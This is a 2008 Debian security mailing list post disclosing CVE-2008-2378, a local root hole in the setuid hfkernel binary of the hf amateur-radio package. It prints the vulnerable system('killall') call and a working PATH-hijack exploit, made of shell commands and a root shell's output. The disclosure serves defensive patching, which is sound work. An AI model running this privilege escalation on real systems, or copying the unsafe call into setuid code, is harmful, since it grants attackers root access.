[Secure-testing-team] hf - CVE-2008-2378 - local root exploit
Steve Kemp
skx at debian.org
Sat Nov 1 10:38:30 UTC 2008
The hf package, Described by Debian as an amateur-radio protocol suite
using a soundcard as a modem, is a program that eventually becomes
setuid(0), and has a trivial security hole in it.
By default the package installs "/usr/bin/hfkernel" as a typical binary,
but when first started via the program "hf" the binary is changed to
be setuid(root).
This is demonstrated:
skx at gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.
If you do start the program as root the permissions are changed:
skx at gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...
Now the program is setuid:
skx at gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel
Unfortunately the hfkernel program contains a trivial root hole:
int main(int argc, char *argv[])
{
// snip
while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1)
switch (c) {
// snip
case 'k':
system ("killall hfkernel");
//
}
Creating ~/bin/killall is sufficient to gain root privileges.
skx at gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx at gold:~$ chmod 755 ~/bin/killall
skx at gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)
This has been given the identifier CVE-2008-2378.
Below is the patch that I've come up with to fix this hole, which
is a simple pidfile approach. Unless anybody has any comments
I'll upload a fix for Etch on Monday/Tuesday.
Steve
--
-------------- next part --------------
A non-text attachment was scrubbed...
Name: hf.diff
Type: text/x-diff
Size: 4000 bytes
Desc: not available
Url : http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20081101/acf2697f/attachment.diff
More information about the Secure-testing-team
mailing list